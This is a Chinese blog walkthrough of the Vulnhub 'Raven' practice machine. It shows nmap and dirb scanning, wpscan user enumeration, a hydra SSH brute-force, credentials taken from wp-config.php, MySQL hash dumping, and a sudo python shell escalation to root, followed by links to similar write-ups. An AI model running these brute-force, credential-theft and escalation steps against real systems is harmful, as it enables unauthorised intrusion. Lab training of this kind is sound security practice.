靶机5 Raven

已于 2023-11-10 15:36:33 修改
阅读量96 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 靶机 文章标签: 网络
于 2023-10-19 21:30:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wj33333/article/details/133813853
本文描述了一次IT渗透过程,包括使用arp-scan和nmap进行网络探测,发现并利用PHPMailer与SSH漏洞,通过wpscan枚举用户,使用hydra暴力破解,最终获取MySQL凭证并提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Raven(乌鸦)

1.信息收集

使用arp-scan确定目标目标靶机

arp-scan -l            扫描

nmap详细扫描

nmap -sV -p- 10.9.47.141 -T4

访问目标靶机80端口

service.html页面的源码里,

成功获得了第一个flag

扫描目录

dirb http://10.9.47.141

查看

http://10.9.47.141/vendor/

点击README.md发现此网站安装了PHPMailer,并且版本号为5.2.16

因为开放22端口

2.渗透过程

使用wpscan枚举一下用户

wpscan --url http://raven.local/wordpress/ -e u

找到两个用户

用两个用户组成用户字典dc_2

使用hydra(九头蛇)爆破

hydra -L dc_2 -P /usr/share/wordlists/rockyou.txt ssh://10.9.47.141 -V -f

ssh登录

ssh michael@10.9.47.141

在/var/www/路径下面成功获得flag2

MySQL数据库

进入/var/www/html/wordpress/路径下,查看wp-config.php文件,成功获得mysql的账号密码

进入mysql数据库,选择wordpress库

mysql -uroot -pR@v3nSecurity



用户:root
密码:R@v3nSecurity

查看wordpress库

use wordpress;

show tables;

查看wp_posts表中内容

找到flag3和flag4

select * from wp_posts

查看wp_users表中的内容

发现两个用户账号密码,但是密码是加密过

select * from wp_users;

明显的MD5加密

切换用户

michael@Raven:/var/www/html/wordpress$ su steven
Password: 
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ 


账户:steven
密码:pink84

3.sudo提权

查看sudo权限

sudo -l

提权

sudo /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'

成功

渗透测试靶机---Raven2
久恙502的博客
10-18 240
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Vulnhub靶机Raven
prettyX的博客
04-05 713
靶机介绍 有4个flag,2种方法获取Root 靶机下载:https://download.vulnhub.com/raven/Raven.ova 开始 1、靶机IP发现,本次靶机的IP为192.168.1.101 arp-scan -l
靶机Raven
weixin_43940853的博客
11-10 1255
大致看了看别人的wp,感觉这个靶机坐下来还是能获得不少东西的 大致分为两种方法,先来第一种比较简单的,第二种可能需要较长时间消化 kali : 192.168.230.224 target : 192.168.230.225 第一种方法(扫描->发现web服务->得知wordpress服务->wpscan扫描->发现用户名密码->用hydra爆破ssh(这里直接试出来...
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 973
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
OSCP  Raven 靶机渗透
Shadow的博客
04-01 374
Raven靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-01 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Raven主机ip为172.16.1.17 nmap 查询开放端口 nmap -p- -A 172.16.1.17 查询到主机开放了80端口,打开浏览器看.
raven靶机实战(linux-udf提权)-vuluhub系列(四)
PANDA墨森的博客
06-28 1135
这是vulnhub靶机系列文章的第四篇,本次的靶机感觉还是挺有趣的,学到的重要知识点为linux下-mysql的udf提权以及某cms的漏洞getshell,开始吧... 靶机下载链接:https://download.vulnhub.com/raven/Raven2.ova 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13189038.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机Raven2:192.168.
Raven-2拿flag思路
m0_66583740的博客
11-15 161
这个靶机主要是考察了三个点,目录穿越,phpmailer,UDF提权。
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
vulnhub靶场【Raven系列】之1,必刷推荐,考察mysql udf提权
China_I_LOVE的博客
01-15 1285
对于网站具有php文件,可进行模糊测试,可能具有隐藏参数最好通过burp代理进行每一步操作,这样可根据数据包分析可能的步骤对于php mailer漏洞的了解与利用,编号ssh爆破的使用对于解密操作,可通过john,这里是省事,采用网站识别的提权方式这里就是因为连接mysql的用户权限过于大,并且还可以写入和导出,所以采用udf提权对于sudo提权的了解。
Raven2--靶机实操详解
qq_61802750的博客
10-14 1253
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
vulnhub靶机——RAVEN: 2
qq_44029310的博客
09-12 2654
本文涉及知识点有:靶机环境搭建,dirsearch工具使用,DS_Store信息泄露漏洞,wpscan使用,利用PHPMailer命令执行漏洞获取shell,UDF提权。
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2911
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
【VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4499
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
kali渗透综合靶机(十)--Raven靶机
W小哥
03-28 2239
一、靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二、Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.4 1、主机发现 nmap ...
Raven 2 靶机渗透
banacyo14206的博客
08-24 1089
0X00 前言 Raven 2中一共有四个flagRaven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
HCIP笔记(第四章)
最新发布
panshiyangmaye的博客
08-03 945
描述区域内的MA网络(广播网络、NBMA网络)链路的路由器及掩码信息仅在区域内部传输只有DR才会产生type2_LSA[R1]dis ospf lsdb network 查看Type2 LSA的具体信息Summary LSA(聚合LSA)在整个OSPF区域内,描述其他区域的链路信息以子网形式传播,类似直接传递路由只有ABR会产生type3_LSA[R1]dis ospf lsdb summary 查看Type3 LSA的具体信息描述ASBR的信息只有ABR才会产生TYPE4 LSA。
组播 | 不同 VLAN 间数据转发实现逻辑 / 实验
u013669912的博客
07-31 1151
……
WebSocket断线重连机制:保障实时通信的高可用性
2401_82591622的博客
08-02 1098
​​速度​​(快速恢复) vs ​​节制​​(避免压垮服务端)​​通用性​​(覆盖多场景) vs ​​定制化​​(适配业务需求)​​自动化​​(无缝恢复) vs ​​可控性​​(允许用户干预)​​终极建议​关键系统采用​​双心跳​​(协议层+应用层)结合​​指数退避​​ + ​​网络状态监听​​服务端实现​​会话无感迁移​​(如Redis存储Session)正如分布式系统名言:“不是考虑连接会不会断,而是何时断健壮的重连机制,正是实时应用的“生命线”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值